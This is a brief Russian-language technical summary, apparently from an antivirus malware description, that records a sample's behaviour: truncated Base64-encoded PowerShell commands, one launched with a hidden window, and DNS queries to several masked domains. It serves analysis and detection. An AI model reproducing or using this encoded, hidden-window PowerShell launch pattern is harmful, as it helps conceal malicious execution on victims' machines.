Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAFQAUABiAGwAagA9ACcAcAByAGkAYwBpAG4AZwBfAHMAdAByAHUAYwB0AHUAcgBlAGgAbABtACcAOwAkAEQAaQBzAHQAcgB...
- DNS ASK pr##ham.org
- DNS ASK ah###dgroup.com
- DNS ASK le###ilaw.com
- DNS ASK eu###ima.com
- DNS ASK no###ote.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABGAFQAUABiAGwAagA9ACcAcAByAGkAYwBpAG4AZwBfAHMAdAByAHUAYwB0AHUAcgBlAGgAbABtACcAOwAkAEQAaQBzAHQAcgB...' (со скрытым окном)